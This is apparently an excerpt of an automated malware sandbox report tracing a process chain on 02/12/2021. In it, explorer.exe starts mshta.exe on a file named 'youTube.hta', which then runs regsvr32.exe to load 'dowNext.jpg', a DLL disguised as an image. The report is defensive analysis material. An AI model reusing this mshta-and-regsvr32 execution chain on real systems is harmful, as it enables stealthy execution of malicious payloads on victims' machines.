                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Analysis Process: explorer.exe PID: 5580 Parent PID: 744

                                                                                                                                                        General

                                                                                                                                                        Start time:04:26:59
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                        Imagebase:0x7ff720ea0000
                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Analysis Process: mshta.exe PID: 5368 Parent PID: 5580

                                                                                                                                                        General

                                                                                                                                                        Start time:04:27:01
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                        Imagebase:0x100000
                                                                                                                                                        File size:13312 bytes
                                                                                                                                                        MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Analysis Process: regsvr32.exe PID: 6688 Parent PID: 5368

                                                                                                                                                        General

                                                                                                                                                        Start time:04:27:03
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg
                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                        File size:20992 bytes
                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Reset < >